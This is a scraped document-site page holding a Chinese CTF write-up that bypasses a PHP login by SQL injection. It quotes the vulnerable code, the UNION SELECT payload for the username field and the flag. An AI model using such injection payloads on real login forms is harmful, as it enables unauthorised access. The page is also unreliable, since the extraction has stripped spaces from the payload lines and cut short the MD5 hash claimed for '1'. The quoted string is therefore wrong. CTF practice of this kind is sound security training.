欢迎来到天天文库
浏览记录
ID:58427611
大小:16.00 KB
页数:2页
时间:2020-09-03
《实验吧ctf题解之程序逻辑问题.doc》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库。
1、程序逻辑问题题目提示是绕过伪代码if($_POST[user] && $_POST[pass]) { 。。。。} $user = $_POST[user];$pass = md5($_POST[pass]);$sql = "select pw from php where user='$user'";$query = mysql_query($sql);if (!$query) { exit();}$row = mysql_fetch_array($query, MYSQL_ASSOC);//echo
2、 $row["pw"]; if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) { echo "
Logged in! Key:**************
3、等即可而$pass经过md5之后的值是我们可以通过正常输入控制的同时,row[pw]的值是从$sql提取出来的目标就一句话:只要我们能够修改$sql的值,此题解决。再次审视注入点:$sql="selectpwfromphpwhereuser='$user'";在这里我们可以利用sql语句,直接给$sql返回一个值。也就是说,不需要访问题里的数据库,只要我们修改了$sql的值,此题解决剩下的就是猜用户名了,试了试admin,不对,然后又试了试username成了user框输入username'AND0=1UNIO
4、NSELECT"c4ca4238a0bdcc509a6f75849b"#·最前面的单引号:闭合原文的whereuser='·AND0=1:为了使前面的表达式返回值为空从而使selectpwfromphpwhereuser=''AND0=1这句话完全没用·接着我们使用UNIONSELECT"c4ca4238a0bdcc509a6f75849b",直接把MD5值作为返回值retuen给$sql,这样在查询的时候$query就会有值·c4ca4238a0bdcc509a6f75849b这串MD5值是数字1经过MD5h
5、ash之后的结果,可以直接用MD5(1)代替·最后的#用来注释掉后面没用的东西·最终,将'AND0=1UNIONSELECT"c4ca4238a0bdcc509a6f75849b"#附加输入到user框里,将数字1输入到pass框里,登录成功。或者username:username'unionselectmd5(1)#password:1key:SimCTF{youhaocongming}
此文档下载收益归作者所有